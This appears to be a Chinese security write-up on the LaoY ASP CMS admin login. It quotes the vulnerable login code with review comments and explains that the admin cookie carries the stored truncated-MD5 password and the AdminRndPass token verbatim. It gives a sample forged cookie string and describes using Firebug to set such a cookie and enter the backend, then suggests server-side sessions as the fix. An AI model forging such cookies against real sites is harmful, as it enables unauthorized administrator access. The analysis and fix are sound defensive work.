老Y保存的密码哈希只取了32位MD5中的19位(见下面代码:从第11位起取19位),所以无法按常规方式还原出完整的MD5去破解。但是老Y后台用的是cookie认证,cookie里放的就是这个19位的值,所以根本不需要破解md5,直接伪造cookie进后台即可。
UserID=1&UserPass=f7820f85727a6a9cc23&UserName=admin&AdminRndPass=b76a6e1fb7b6e0aafb1bcea1c8608b59
上面的是cookie的内容。但是老Y还有个ranpass值(即cookie中的AdminRndPass),这个值很坑,没有这个值也是进不了后台的。
' Admin login handler: runs when the request carries action=adminlogin.
' Verifies the captcha and the name/password pair against the [<tbname>_Admin]
' table, then issues the "LaoYAdmin" cookie and stores a fresh AdminRndPass value
' in the admin row.
' CheckStr, md5, RndNumber, Alert, GetIP, tbname, conn and SitePath are defined
' elsewhere and are not visible in this listing.
' adminip is declared here but not used in the visible code.
dim adminname,adminpwd,adminip
if request("action")="adminlogin" then
' Both form fields are trimmed and passed through CheckStr.
' NOTE(review): CheckStr is presumably an input filter; it is the only thing
' standing between adminname and the concatenated SQL below - confirm what it strips.
adminname =CheckStr(trim(Request.form("adminname")))
adminpwd =CheckStr(trim(Request.form("adminpwd")))
' Password hash: md5 of the fixed prefix "laoy" plus the (already filtered) password,
' then only 19 characters starting at position 11 (Mid is 1-based) are kept.
' The prefix is the same for every account, so it is not a per-user salt.
' The truncation does not protect the account: the truncated value itself is what
' gets compared in the query and written to the cookie below.
adminpwd =Mid(md5("laoy"&adminpwd,32),11,19)
' Per-login token: md5 of the literal "laoyadmin" (split into pieces) plus RndNumber(...).
' NOTE(review): if RndNumber is built on VBScript Rnd, the value is not
' cryptographically random - confirm, and prefer a CSPRNG-backed token.
adminRndPassword =md5("l"&"a"&"o"&"yadmin"&RndNumber(1,9999999999),32)
mycode = trim(request.form("code"))
' NOTE(review): whether Alert stops execution (e.g. Response.End) is not visible here;
' if it does not, the checks below fall through to the database query - confirm.
if adminname="" or adminpwd="" then
Call Alert("请输入用户名和密码!",-1)
end if
' Captcha: the submitted code must equal the value held in Session("getcode").
if mycode<>Session("getcode") then
Call Alert("请输入正确的验证码!",-1)
end if
set rs=server.createobject("ADODB.Recordset")
' The query is built by string concatenation. adminpwd is md5 output at this point,
' so adminname is the attacker-influenced part; a parameterized ADODB.Command would
' remove the dependency on CheckStr.
sql="select * from ["&tbname&"_Admin] where Admin_Name='"&adminname&"' and Admin_Pass='"&adminpwd&"'"
' Cursor type 1 (adOpenKeyset) and lock type 3 (adLockOptimistic): the recordset is
' opened updatable because the matching row is written back below.
rs.open sql,conn,1,3
If Not rs.Eof Then
Session("YaoContent")=""
' The cookie carries the row ID, the stored password hash, the admin name and the
' per-login token, all in clear text.
' Security: UserPass is the database value verbatim, so the stored hash is a
' credential equivalent - anyone who can read the admin row holds every value this
' cookie contains. A server-side session holding the login state (with only an
' opaque session id in the cookie) avoids exposing either value to the client.
' No Secure flag is set on the cookie in this block.
Response.Cookies("LaoYAdmin").path=SitePath
Response.Cookies("LaoYAdmin")("UserID")=rs("ID")
Response.Cookies("LaoYAdmin")("UserPass")=rs("Admin_Pass")
Response.Cookies("LaoYAdmin")("UserName")=rs("Admin_Name")
Response.Cookies("LaoYAdmin")("AdminRndPass")=adminRndPassword
' Expiry is commented out, so no explicit expiration is set on the cookie.
'Response.Cookies("LaoYAdmin").Expires=Date+1
' Record login time and client IP, and persist the new token in the admin row;
' the stored AdminRndPass therefore changes on every successful login.
rs("Admin_Time") = Now
rs("Admin_IP") = GetIP
rs("AdminRndPass") = adminRndPassword
rs.update
response.Redirect "Index.asp"
else
' Same message for unknown user and wrong password.
Call Alert("您输入的用户名或密码不正确!",-1)
end if
rs.close
set rs=nothing
end if
上面代码的逻辑是:先要求输入管理员的账号密码,校验账号密码正确以后,将新生成的adminRndPassword(一个MD5值)update到数据库中,同时写入cookie。所以不但要有管理员的pass,还要有ranpass,才能进入后台。
有了这两个值,直接用firebug伪造一下cookie就进去了。问题的根源在于cookie里存放的就是数据库中的原值:只要管理员表的这一行被读到,就等同于拿到了后台登录凭据;修复思路是把登录状态保存在服务器端session中,cookie里不再存放密码哈希。